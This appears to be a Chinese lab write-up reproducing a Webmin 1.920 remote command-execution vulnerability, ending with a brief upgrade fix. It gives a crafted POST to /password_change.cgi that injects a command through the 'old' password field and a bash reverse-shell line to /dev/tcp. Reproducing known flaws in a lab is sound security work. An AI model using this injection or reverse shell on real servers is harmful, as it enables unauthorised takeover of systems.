漏洞描述:
Webmin是一套基于Web的用于类Unix操作系统中的系统管理工具。
Webmin 1.920及之前版本中的rpc.cgi文件存在安全漏洞。攻击者可借助特制的对象名称利用该漏洞执行代码。 账户密码:root/root
复现过程:
1.访问https://ip:port,出现如下页面,开始实验
2.输入账号密码,进行登录
账号:root
密码:root
3.通过burp随便抓取一个页面的包,并修改请求内容,执行id命令
POST /password_change.cgi HTTP/1.1
user=root111&pam=&expired=2&old=test|id&new1=test2&new2=test2
4.本地监听
5.构造反弹shell命令,并对其进行url编码
bash -c "bash -i >& /dev/tcp/ip/8888 0>&1"
6.监听成功
借此漏洞,攻击者可以继承Web服务程序的权限去执行系统命令(任意代码)或读写文件;反弹shell;控制整个网站甚至控制服务器进一步内网渗透。
修复建议:
1.升级版本。